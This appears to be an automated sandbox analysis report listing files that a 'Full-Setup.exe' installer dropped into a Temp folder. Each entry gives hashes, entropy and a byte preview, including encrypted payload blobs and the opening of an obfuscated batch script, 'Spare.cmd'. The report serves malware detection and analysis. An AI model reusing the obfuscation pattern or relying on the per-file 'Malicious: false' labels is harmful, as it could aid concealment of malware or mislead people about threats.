Preview:	Mary........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Investment

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	7.996985256174753
Encrypted:	true
SSDEEP:	1536:cDoCXe96P0eozi+yFr/3FuQCvu0QJJ8f2aIjKUMSaWh:VCXv/FrfFJ0QJJ8unMSNh
MD5:	38062A198A4BF52F088041F64AB93041
SHA1:	F7502F95945A0260D05727481695B7483391EAC8
SHA-256:	F20FE6A279154F621E2B8FB596C58A3120AA4934098981E578F19BE1FFEE4EB0
SHA-512:	00C0048EE79F7E438514CA2EB4E2BFDA727210325C061E2CC1B3D25AE6D380BD2133392355B7D1FD8AFCF08F9A30C30F66FEC525CD21E948BFB6567572B04767
Malicious:	false
Preview:	).....hL....k7]HC+........t..!j..`../.....=....c....Q.YA......$...q)......K..+...IB...T.s.~t.g{`...D..,...q...gF.!j.._%..d...m.9....J.P.....&u.<.r.xl;%..T.........0.B.b......T........e...3...."`%.f....%....9.I}.../Hn...9E.G......F..w.5O-...q.F....{.m&~K.}..}{....Wwn.S.5>..Ak...Z.....p.st....YQE%.........b>.f..9........C.A.............Q5.4....=50.....k.."......A;V....}j-9:?1..i...R.q.E.[f+..m......w.....M@.Q.....[..]...w.........m^.:.6.U.\.k..i..(:jrWU..P...}..]p.tG.....Lu8.l.}XL[....!...F....["}.l..=Z@...R...~.....NV.O..#c.....lQ..a...&....J.<....s.%.;;..1N7G.!.5c"......F:...IF......m.Z>......HI.#..}n............1`W......f..A.11...a.5e..F.X>..In.k..!..8.V......SL($Y.....,.y~...a..3.6z.e..L..8.........gV.....}.i.Y.2..P-1.T..V..P.^..H..X..2t...,s...".....C.M..2...~0....B...BW.O....B'......p..~1...Qd.f..).O..&..pM.@..~.G.K.R..K...$!.^.6s.).5..^.H......8.,+..NX.{"j..x-?q...o+?....@......UM.c`.......?]...n....P.c%u=...K..0e......%...:Q.{....$;...

C:\Users\user\AppData\Local\Temp\Mag

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	7.996700191862379
Encrypted:	true
SSDEEP:	1536:uKm+ilgd4L5JsSEg7745tXKhU0DVnILovDxqpdQ6nh/Va:Dyg+L5SSl70zZQIMbMI
MD5:	149E03721E023DB8F8D078B92A4EF84A
SHA1:	1250ECBF710A200A58F2F6BAA7FB085825027146
SHA-256:	91CE9275890A094CC874C115BB81DAA37C2B576B8E64B0A602B024CF70D9B6DD
SHA-512:	5AD9F4DBC04D665872C1377A7884A7FAF947ED59228A50E0F46AA5CC2F085C04A17F5355A1D8030EFF7D34230C22336F5799CD76B0BACA1797E6771313ECD5AE
Malicious:	false
Preview:	.}d.bV.E_1.M6%.....4..xz..c..KM..I...Y......'.o....e.X.<`...d..!H....;.._y.\<......cQ..#;1.....c...P9...#....n$.8$.:..T.......r.....s.`...8...w;.!..z..P1^..r#.T.E.....\J......)..n.....K.x...Z........:b.....T.Z-.-F...Z../E".z...../,.i...YY.S......p.%...._.............$$..a..X....Q6in.zI.0..xMZ.....JN.[..w...n..H.s.&o..\.J...h....C......Pj......T....R4.F...xV..%....r..\.....+/...x...;......i..Sg}..I..H._Ub..\...A..s...G_.y.>.k.F."...~x.(.S4."..=`o.X.n.....4....5..,..`j.t.p.S....F.)+'nor3..8U+...l.).s/.........U.<..qh!va..[.V.......S.3..9...J.0....>..w.}r.a.b]...w.......}.u\u8w`....+..c.=..o...E^.@h.5.XF...h..U.O....vXM.P.p.6....Vr5.C..vI..i].+.....I...-....eN..7{)G....]....#.B..<....1...k4......>...$....9.M..z.....o.(...o.Jt..X%..L......,.....)..g.1.6......9E'./.0J.O.&....$.A.u.......!..`.Qia............ ..j}&La.......B..m..cb..6........3@:qf<.X ........A5...p.l..G..{.y...c.)..9.I.wX.d.....zu.L...P....S.2F.%..@.E..H.c..)....XV

C:\Users\user\AppData\Local\Temp\Magnet

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	82944
Entropy (8bit):	6.681768165291777
Encrypted:	false
SSDEEP:	1536:xPYcSyRXzW8/uC6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUnH:xZydTmRxlHS3NxrHSBRtNPnH
MD5:	FFABB2BE8380B86FD04E734FDF38BACC
SHA1:	D0C6F268324BFCD77ED91234F5C8876137FCB80A
SHA-256:	79D01BEA083FCE9BB3E7C03662850F919C8A2401CAD0AC3BE01D793CC2D3EFBD
SHA-512:	D9E8F965DD38408D409117649714E24707D09379E27012A9C1686514867EE0BC6C673F78D4DD45C9B518F845743F5770A0CF2236473055697BD94A01E5C19A2C
Malicious:	false
Preview:	....E.......v...n.......................M..........E...M.@.E.P.u.V.u..u..........t.....E...}.@P.u...V.u..u..................E.9E...S...;~\|.............U..t*..%....=....u.............%..............R.U..^...............E....E.@P.u...V.u..u..;..........z.....................;.......;......;................;......#................;...........E...}.@P.u...V.u..u..................E.9E...R....E....F\|+.;.w.Q.u.W.-.......u..E..4.E.....Q.......F\|+.;...A...Q.E.PW.R-.........+....E..E.<G.E...@..P.u.V.u..u..2..........r........E...}.@P.u...V.u..u.................E.;E.......;~\|.........9M.t.9M.......@....E..E...@P.u.V.u..u.........t..v....E...@..P.u.V.u..u...........S....M.;M...%...;~\|............9E........E.A@.M.P.u....V.u..u..H........t.......E...}.@P.u...V.u..u..!.......}................U.;U.......;~\|..............%....=....u.............%..............9M...g...9M...^....E.B@.U.P.u....V.u..u.........t..X.......P....E.;E..."...;~\|.........9M.......9M.......@....E..E

C:\Users\user\AppData\Local\Temp\Mention

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	10131
Entropy (8bit):	7.983197495423112
Encrypted:	false
SSDEEP:	192:XxHE7GMZJWlDTuT35RHywKUruESynNU3xABu6oy8BESDnS9Klk2tK+:XK7GcaDTQpFy7iuEXUNy8BjS92M+
MD5:	560CA045FB9B1264F61611757439A847
SHA1:	EA276B1B6FEE3CB74C572139399E8889A4280FAD
SHA-256:	EA3DCBBAFDA14BDDBAE57A5D39B1A58A1BB245F4DCA494B32CAE4A04F162C07D
SHA-512:	4C3B4C11C26988E1E17A62C38347EEF7958BA4FE5CBDD166F0F824B66D8DCAE60ABF438AFC80201C8817E5C4D6439525EC6B49D847B9100508AF76255FA24B0C
Malicious:	false
Preview:	...9.......fT..A(.....f...o}.\>:.o,\.".%4.TQw..b.h.54A....,....<......m............../...vN.....;)]....._......5.OBm....Ss)cb+..b..A.]W....Tw./0...& .<. g.....6.........(....@.7.a..C1.w........o....L........(.u2.".AL..v.fy..XQc..voeC.`.....S.)..[.o};.X.L..<7.O.0.-%@....y]h....}.....G.-.{..f...^U...........t%5.....'.....f........^.d].......u....E.........\........;...,=e..n.~....T.S>}.......7...I..>.k.~.S...7.,.NP....&7..P.GT...w...)S...S..!{...;.......FmQ.n.A....6?..............".!.X../.`D..d..+...8..I...$.._....+^...!.c..Z.._o.2....t..5"A@..A..ST.......T@\|.#X4_.6S..iW...-..d._....N.e......I...&v..h3.-....h.H0..Ip..d..S..\|78..`...m.mS..2..',.....$.c...e..JW.+.,[!........e}.H6.........Oq.7...U.S'..{&....]...0.0.".._,.."\..........\|."p..{!..LN.....a.'....O..o...M`.......W.... ..(C..AT...kD.#... 4..^.v.7YFLH..>.^>_.,98.E.9...r.........M.H...B_%.4rH.7u}..&.........!c.G...-.k..2r.(.<..@0.....c..5aG!.....O...........J..0..2.t.s...x.H.j.v.X. ..

C:\Users\user\AppData\Local\Temp\Papua

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	6.656983685838322
Encrypted:	false
SSDEEP:	1536:+I7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu68:t4CE0Imbi80PtCZEMnVIPPBxT/k
MD5:	EE9AE74A67B9F05583818D77D0221C0D
SHA1:	62AA9DEA5E4C445DAE21973605FE6D34EE1A1CF2
SHA-256:	84F682762E875AF5F92682D4D3F2FEA6E4BC57CBCDB52133E7B864DCA22A19D5
SHA-512:	1A7E024118146D0489AEF9D3A68BABA5E85FCBCF7DD2ABA8FD97B76BFBC9D09B893A6F5F6876419DE0179892B039BA8756167E28F8CF24CD5FD2629CD4EE0C60
Malicious:	false
Preview:	..f.(.f.Y.f.(.f.Y.f.(-pBJ.f.Y.f.X-`BJ.f.Y.f.X-PBJ.f.Y.f.X-@BJ...Y.f.(.f......X...Y...\.f..\|$..D$..f./..BJ.......f.(.f.Y.f.(.f.Y.f.(-0BJ.f.Y.f.X- BJ.f.Y.f.X-.BJ.f.Y.f.X-.BJ.f.Y.f.X-.AJ.f.Y.f.X-.AJ.f.Y.f.X-.AJ.f.Y.f.X-.AJ...Y.f.(.f......X...Y...\.f..\|$..D$....~.f.W.f./..BJ.sO..~..BJ...~-.BJ...~...X.f.s.,f...f.~..@..~,.p.J...~...\...Y...X..BJ...^.f............~...~..BJ...^.f.....~..`.J...~$.h.J.f.(.f.Y.f.(.f.Y.f.(-pBJ.f.Y.f.X-`BJ.f.Y.f.X-PBJ.f.Y.f.X-@BJ...Y.f.(.f......X...Y...\...\...\.f.V.f..D$..D$..f./..BJ.u..D$..f./..BJ.s....BJ....BJ......$..$....D$.....BJ....BJ..D$....~...~..AJ.f.T.f...z..D$.......BJ....AJ...D$..........U.........$..~.$.......f..D$.f..%.CJ.f....CJ.f.W.f....CJ.....f.s.,f.~....... ..f.............#.-....=............Y........\...Q.f.T.........f...Up.J.f.V.f.($.p.J.......X...\...Y...Y...Y.......X...^.f...hCJ.f..-XCJ...\.f.s.?....f.s.?..Y.f.p.Df..5`CJ...Y...Y....f.W...Y.f.\%.BJ...Y...X...Y...\.f.p....X...\...\.f..D$..D$.....-......A..-...f.s.&f.s.&f...f.U...\.......

C:\Users\user\AppData\Local\Temp\Pee

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.997949338114034
Encrypted:	true
SSDEEP:	3072:CLYXB9uDUmCohfFM6vbw1fDYOtEEAAkKC:CLuB9CUmJhfp5OWEAA2
MD5:	ECC963D1E312883D45DC5CC749D910AA
SHA1:	F5A120D552231179530E69E1951BDAE890779BD7
SHA-256:	D25B37F9A72A140CF30A8F1DC6F4DC3DF05932DFB256085EF2158F2E6A1E3A68
SHA-512:	149D9C772055696190118E9239B9B2536E80508AC69CF685FA4BBD47120BDD0411A2F0DF82BED3EB14B9F14E91EF5BAE16AF8B4F58D9417D7490A345B5C6DD43
Malicious:	false
Preview:	K/......)..29@...u:.....q...&L.$.$.V.9..z.%..0...5[....s;Z.C.n....v..`.. a4>9i....O.FW.t..D.b..J..?.S.n..Y...g7VH.9d.I..n...O3.g.F.cC.I.Z.)....:......M..EY..X._.{'.O).$D#.h.n.....V.G...@.I........p.O.T+.V.b/.....;.\..j:"o:E.S.y.I........ .....p...T..Z...b..!.D9Sf..M.aM...e.....qM.!.V...W.@.{IuDnK.....4d....B..R'.e~.s..c....8%.M.W..;....,.a=M..@..D{x'.gr..1......q......y.L....E.(6K0..U.E...=.e.g.....J~.A.....a./.=.U2{m..T....!..mG,.B.;...9...x...pZ.F.d.9.h:.......J...9...Ec....z..E.O.....]..<}O.......S...D..}.......)..^2...Dd.P.G...c.....s...Y8...R...Gw....t..s"...................#..F..^...n.....q.~..\|T.~.Bb.!.n..e.....E...>0.._..o....l..%...s...<f:b...4...y..:..,\|btm.=v..+o.S.]i.......OT[.x.{. ..........d1.....L.d5W.N:.!.W..m7f.y.6.w..L2a....*.;.......bX...n."...xW...._.lILT...]REY.T...5........q.Z."...,..?...':l7..y.$M0..n;.3.y.XZWg..6. .!bf..Y^!.@........F..G....n..&.R1.,..,.....f.fC..;.@.5.......W.....Z.......

C:\Users\user\AppData\Local\Temp\Problems

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	Matlab v4 mat-file (little endian) I, numeric, rows 4259917, columns 5111881
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.704124876167274
Encrypted:	false
SSDEEP:	1536:6AsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphA9:hhxjgarB/5elDWy4ZNoGmROL7F1G9
MD5:	5F65D16A1B820F1E1D16D01DECB18D3B
SHA1:	BAD2E8A758D6ED2F690119AD3054269194104D10
SHA-256:	3EBF133638F77DD24132E58E995EF5D71C01509FAABE99A3C4466A803C689198
SHA-512:	F0E412AEC9D75AB3F3CE454C924B1F9E276CB2FB514F4D1ACEB4BAF6E639DAF8F355D4ADA8320D501DD15995D74D206E00665908C9EDFFCE9069FFFD6CBAD178
Malicious:	false
Preview:	....M.A.I.N.....P.R.I.M.A.R.Y...M.E.N.U.....S.E.C.O.N.D.A.R.Y...n.u.l...0.x.%.p.....T.r.u.e.....F.a.l.s.e...%.4.d.%.0.2.d.%.0.2.d.%.0.2.d.%.0.2.d.%.0.2.d...D.e.f.a.u.l.t...w.+.b...EA06....S.C.R.I.P.T.....a.u.t...w.b.....FILE....".%.s.". .(.%.d.). .:. .=.=.>. .%.s.:...%.s...%.s.......".%.s.". .(.%.d.). .:. .=.=.>. .%.s.:.......^. .E.R.R.O.R. .....%.4.d.%.0.2.d.%.0.2.d.%.0.2.d.%.0.2.d.%.0.2.d.%.0.3.d...%.4.d...%.0.2.d.....%.0.3.d...................L.P.T...a.l.l...c.d.r.o.m...........r.e.m.o.v.a.b.l.e...f.i.x.e.d...n.e.t.w.o.r.k...r.a.m.d.i.s.k...u.n.k.n.o.w.n...:.\.....c.l.o.s.e...c.l.o.s.e.d.....o.p.e.n..... .t.y.p.e. .c.d.a.u.d.i.o. .a.l.i.a.s. .c.d. .w.a.i.t...s.e.t. .c.d. .d.o.o.r. ..... .w.a.i.t...c.l.o.s.e. .c.d. .w.a.i.t...P.h.y.s.i.c.a.l.D.r.i.v.e...R.e.m.o.v.a.b.l.e...F.i.x.e.d...N.e.t.w.o.r.k...C.D.R.O.M...R.A.M.D.i.s.k...U.n.k.n.o.w.n...S.S.D...S.C.S.I.....A.T.A.P.I...A.T.A...1.3.9.4.....S.S.A...F.i.b.r.e...U.S.B...R.A.I.D.....i.S.C.S.I...S.A.S...S.A.T.A.....S.D.....M.M.C...

C:\Users\user\AppData\Local\Temp\Recruitment

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	87040
Entropy (8bit):	6.663806941701145
Encrypted:	false
SSDEEP:	1536:dr5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLp:D0nEoXnmowS2u5hVOoQ7t8T6pUkBJR85
MD5:	F13B4C89E106DFA681955261ED36AAD2
SHA1:	585B968FFFA3FFC204AB90330B50DC6A859F441A
SHA-256:	9F4EF31673E2872B9D4E992E473FFEEF21D580641A5DDC6FF4A70C2DA2C4BD76
SHA-512:	E1ED7175E61FBCC946E39E94C952EDCAAF1C9974ADBC79F8BFE8C4390B57DC9BE7D5A77047F00845EA0266DA23BFCC07EE266D0B215FB35CAA587152F9EBADC7
Malicious:	false
Preview:	.H.I...u.F;.\|..oj..E.PV.B)......E..P.uY...S....~M.E.j.Wh,....0..H.I...t1j..E.PW..)...E....9p.t.h .K....8?...E..M.Q...*?..G;.\|._^..[....W3.WWh.....1..H.I.WWh....P..H.I._.U.......SV...D...W......3j4.M....3..D.....h.....9....M...j4V.E.M.P..D....E......}.....V.u.hs....3..H.I.h......D...PW..D.......M...D...P.cX....D..../..._^..[....U.......SVW....D....).....E.j.Y.7..M.j4..#...D....E.......D...j4S.E.P.S....u....u3SVh+....7..H.I...D......._^..[....SVh+....7..H.I.F;u.~...U..QQVW3...VVh.....7..H.I..E...~+j.Vh,....7..H.I....V.....E.V.u..)...F;u.\|._..^..U..V....w....6.u.h....P..H.I...^]...VW.......V....7....I...2...C....._...^.U......SV..x....u......3.SSh.....6..H.I.9].\|S9E.}N.6.......x...S.P......E.V.u.h.....0..H.I.S..x...PV..x........M...x...P.V......x....g...^..[....U..S...VW.......=..I.j.j%..5..I........}..P}&j%h.....3..j...\|.I.j.j%..........Pj%.$j'h.....3..j...\|.I.j.j%..........Pj'h.....3..j...\|.I...2......_^..[]...U..j.j.h.....1..H.I..M......u.2...@....]...U..QQVW.u

C:\Users\user\AppData\Local\Temp\Reports

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	6.560976472595233
Encrypted:	false
SSDEEP:	3072:yhpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioOe:yhp6vmVnjphfhnvOe
MD5:	3760BDB784DCAD0AA36EA4BE07FBD6AB
SHA1:	58C5689C2FC12B3D39E6FD649CE7B5ED02D42A8E
SHA-256:	C3D65628C293F0147AA3E90423DB4B1886CD7856AAC53E9A6F949FCABE48F79D
SHA-512:	50DF58C870A7DAB50FD81FB38ED452D85ED9894310281302A5066FEB2B37C554222E8DB5CE9AB23A58CB758E33AC273F38B5C17015E03CBDBF6F4945856272CC
Malicious:	false
Preview:	...Y..G.......O..?.........F..0.......v........_(...u........_(SV...{....................."...........G(.t@.G(.t..G..G.u2..,.u.j.h.EL.....,.u.j.h.FL.....,.u.j.h.FL.... U...\$.3........D$...t..........8.t.F...;.....r.j ...Y.D$..H..>...L$.;t$.u..D$..L$.P.................................... ........]........x..e...F.......0.I..T$.j.P...H....5...Q...7....]....Re......C....._^3.[..]...U..E.j..p..u.P.....]...U......$SV.u...W....e...E.3..&.G.~..@....x....A...j8........$.....'.....Y..G.......O..=..........E..@..0........v..............PV.G(......................?......!....G(.t".G(.t..G..G.u...,.uYj.h.EL....[S...u.h.....L$$.u...3..D$...I..D$..D$..D$..D$ ..P.j,...........D$ P.L$.........,.u.j.h.FL...,.u.j.h.FL..Q.........@...x...H.t..I8.A......x...H.t..I8.A.......j.P.D$...P..#....u....@...x...H.t..I8.y..........D$.......x..!....\|$....u;.ac...&..F........@...x...H.t..I8.A......x...H.t..I8.A.....D$.P.......j..t$..H.........E..@....x..u..........t.Q........L$..D$...I..M

C:\Users\user\AppData\Local\Temp\Shopzilla

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	7.997935702283946
Encrypted:	true
SSDEEP:	1536:JjpymIzizyvmFE4X77xQDqKWE6kvNNBq24is4S+tby23MbW3G3loF6nAbrgWEO3:1IzQyvme4LtQGKWE6kVn4CFM0G3uSc3r
MD5:	C8AE5BE66F71380C70F374B21E76891E
SHA1:	8CC15FA14E67A645A2C5BE3BE28A92BA15EE5E49
SHA-256:	A3495B1E7A2A324A57C9A494795DC33366309E0DA283FADA01950D2795B8A859
SHA-512:	5364F684BB844711FCDF9B174BBC26471D6C24ECE3BE79518ADF892D281A3DDE1E9D805BFF5138D0C9D3EED5C1B5021FDBCD6A05AF058BED2EA17F479700655D
Malicious:	false
Preview:	..:9..M.a..N)..h9$....L9.jj.B-=].VC....>9...O....1T.`..O.w...?.4^].....`Z.g6B....\|}..f..kD..5.K.$..=.......B.]}..G)T........i.F.C/.$. -.?.C.s.E .].'>..(0..l.....EL.:6.6a....J....o7g.D..T`...I<;......)..%Mb..0.l.rQ.E6.G54.n........k...DS..'.8...M.?n..1.^^:....~.8G.....f?..3N,{E......r..44.gO$I....`...7.Q...xoX.Rl.I/i.....!j....\..;.......D[.r.i.+.`<.=I...L9t.....ui.(..-.i}:..S....Bd..\|2.p~...hUYHp....x..QQN.)S.......G..=I..>4.n.L.!..f..6..5^..... ..X...}'.jf..O._V.\|M.ZUc.Y..E.J...i...6ZM..v........9..bn.a.4se..C`..............g9....X\.....Y..[.}...r<v....\|.QgL...T.$%..6..l.Lw\|.)\j....../K.%.^..n..L.....n...&x....a.m.K.OEG.g.b-.....A..:....m0s....Z..Du.Sp.]....0.......{"+........m...[.o..='...!='.G....j.\|5-51.'...<N.n.._Y......X...N.u....@...0h.wy.Bh.G..\r...Y...............n?C.S.-Xz...)...321..9..?{t+.(..cz..qY.G...`.K#......]2..*S.}.N...0........V.s..cc.#.Y.S...j....."c.X9..V.N4!i:.1..>..cN<..Z...._.Q.)...xq.#f.2.J..m.....:.%.>...

C:\Users\user\AppData\Local\Temp\Spare

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	ASCII text, with very long lines (609), with CRLF line terminators
Category:	dropped
Size (bytes):	13827
Entropy (8bit):	5.117855141294102
Encrypted:	false
SSDEEP:	384:ULaJc1avY8sSRm9S/1NFJu9+4gnTkErJv1SmHsuXXhB:ULaJc1j89RYGFJu9F0pJv1S6zHn
MD5:	78B0DAEC569C0BA30DC288E6A88A2988
SHA1:	D536E6666978BAF85345C37DBB349A1FFF25156E
SHA-256:	812E8DF7B39D7F25FF253082C4375CC1B48F94AAF1AD6825C68772F283FF89F9
SHA-512:	48DC0B76AFC57D20BC05C282C96FC9608E3AC3755851E358BF55FDAB60C4D51363DFA5D80803517FC0ACD0343718F404E3B8C526450C4BD7105413C527C438DC
Malicious:	false
Preview:	Set Mph=a..ecIQAssist-Para-..HlDPassport-Labels-..TLQCassette-Privileges-Bbw-Solving-Except-Bosnia-..PprmPublishing-Terror-Semi-Documentary-Lists-Maximum-Deutschland-Arrangements-..LBOWal-Risks-Fortune-Headers-Booty-Indiana-Hard-Employers-..ClYFi-Pty-Framing-Different-Intervals-Dishes-..xSStaying-Dad-Zdnet-..nNHi-..fwFf-Happens-Graduates-Ave-..Set Assured=v..NhYCashiers-Rings-Undergraduate-..ZlExtensions-Ata-Music-Understand-Clearing-..IxWPharmacology-Newer-Tv-Martha-Cards-Thirty-Unlike-..WWFnLatin-Spreading-Steal-Toll-Vessel-Cuts-Gets-George-Albert-..DcUxSecurities-Movement-Indeed-Officers-Dem-Street-Boxing-People-..NqYou-For-Antigua-Drill-Tend-Stops-Charlie-Beauty-..Set Sie=M..hlQuiz-Ties-Participated-Juan-System-Egypt-Irs-Register-..vPDiscounts-Ins-Dude-Opportunities-Pork-Coupons-Finding-Commission-Dream-..rPdStations-Residential-Equations-Robinson-From-Biodiversity-Estimation-..XZPossibility-Approval-Headers-Mixture-Fell-..aOCWEarrings-Investigate-Pdf-Simpsons-Tools-Ages-New-Badly-

C:\Users\user\AppData\Local\Temp\Spare.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (609), with CRLF line terminators
Category:	dropped
Size (bytes):	13827
Entropy (8bit):	5.117855141294102
Encrypted:	false
SSDEEP:	384:ULaJc1avY8sSRm9S/1NFJu9+4gnTkErJv1SmHsuXXhB:ULaJc1j89RYGFJu9F0pJv1S6zHn
MD5:	78B0DAEC569C0BA30DC288E6A88A2988
SHA1:	D536E6666978BAF85345C37DBB349A1FFF25156E
SHA-256:	812E8DF7B39D7F25FF253082C4375CC1B48F94AAF1AD6825C68772F283FF89F9
SHA-512:	48DC0B76AFC57D20BC05C282C96FC9608E3AC3755851E358BF55FDAB60C4D51363DFA5D80803517FC0ACD0343718F404E3B8C526450C4BD7105413C527C438DC
Malicious:	false
Preview:	Set Mph=a..ecIQAssist-Para-..HlDPassport-Labels-..TLQCassette-Privileges-Bbw-Solving-Except-Bosnia-..PprmPublishing-Terror-Semi-Documentary-Lists-Maximum-Deutschland-Arrangements-..LBOWal-Risks-Fortune-Headers-Booty-Indiana-Hard-Employers-..ClYFi-Pty-Framing-Different-Intervals-Dishes-..xSStaying-Dad-Zdnet-..nNHi-..fwFf-Happens-Graduates-Ave-..Set Assured=v..NhYCashiers-Rings-Undergraduate-..ZlExtensions-Ata-Music-Understand-Clearing-..IxWPharmacology-Newer-Tv-Martha-Cards-Thirty-Unlike-..WWFnLatin-Spreading-Steal-Toll-Vessel-Cuts-Gets-George-Albert-..DcUxSecurities-Movement-Indeed-Officers-Dem-Street-Boxing-People-..NqYou-For-Antigua-Drill-Tend-Stops-Charlie-Beauty-..Set Sie=M..hlQuiz-Ties-Participated-Juan-System-Egypt-Irs-Register-..vPDiscounts-Ins-Dude-Opportunities-Pork-Coupons-Finding-Commission-Dream-..rPdStations-Residential-Equations-Robinson-From-Biodiversity-Estimation-..XZPossibility-Approval-Headers-Mixture-Fell-..aOCWEarrings-Investigate-Pdf-Simpsons-Tools-Ages-New-Badly-

C:\Users\user\AppData\Local\Temp\Stayed

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	6.258235350072752
Encrypted:	false
SSDEEP:	1536:gbLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6RM:gbLezW9FfTut/Dde6u640ewy4Za9coR9
MD5:	C38E98A01F47F09C5524D9C3EBC605C3
SHA1:	A06B099F49EA4486C84E036A0EDD3F3999914A09
SHA-256:	B9ED1A0EB8A71FF3C88578AB137D2BC74A420AC4CBF0A517278718648BBC18AC
SHA-512:	8050FB3F27D8D0A995D8CC441193BDBD6CDCA2518721001B7EA3EA8B1690AFEC03ECDA09FEB97DC526F662642C9A30AAB4EE3F72533C0D12B0EEF2CD99AC4929
Malicious:	false
Preview:	[..]...U.......V..M.h..I...`...u..........u....H..\|1...D1.t..@8.@......\|1...D1.t..@8.@...a.L$..6..........D$.P..8....u....H..\|1...D1.t..@8.@......\|1...D1.t..@8.@.....M..D$.P.n...L$......3.^..]...U..V.u....m.....u..u.........&..F.............j..0.. .I.3.^]...U......DSV.u.W..V.\|$ .!.....u>.u.......3.3.B...V....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X..X....L$0.0....F..p....p....N....D$ .A..D$$.A..D$(.A..L$ .D$,...P....t$$.t$$....I.h..I..L$D.....u....D$@..P.Zl...~..r.....h .L..\|$...?..Y.L$$3.;.uU..t..T$ . .L.+...4...8f;..t$..u..\|$..\|$.u.......u...u.SSh.....P....D$.f9D$......@..h@.L..>..Y.L$$;.uU..t..T$ .@.L.+...<...0f;..\|$..\|$..t$..u.u.......u...u.............D$.f9D$......@..h`.L..A>..Y.L$$;.uq..t..T$ .`.L.+...<...0f;..\|$..\|$..t$..u.u6......u...u9.F..L$0Q.H..p....P.....P...........D$.f9D$......@..hp.L..=..Y.L$$;.uZ..t/.T$ .p.L.+.T$...8.....\|$.f;.\|$.u&.T$.......u....u!SSh2....7..H.I.....f;T$......@....L..L$ .......t&.F..H......j.Ph,....7..H.I........K......L..L$ .....

C:\Users\user\AppData\Local\Temp\Thinks

Download File

Process:	C:\Users\user\Desktop\Full-Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.3010489615002685
Encrypted:	false
SSDEEP:	3072:uZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWH:uK5vPeDkjGgQaE/lN
MD5:	18494B05E15EF847ADA16F0467AD0760
SHA1:	B50C06ABF5096383FF3D9345D4C6DA1FFE575868
SHA-256:	807B9561B71FEE9AE0E85FE8CC78CB9CDCA50C7B15072E93FB8124F11DB8ADC1
SHA-512:	E669C689FA360548F3762F8E7FCA3BDAEE47C4682AA3AAD23C763676D9BECB8A436412CDC8486AEB79C7A4610227285D96F1DBF08EED0E80FAE08A1904045FEE
Malicious:	false
Preview:	.........................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qn3fd24s.2fm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
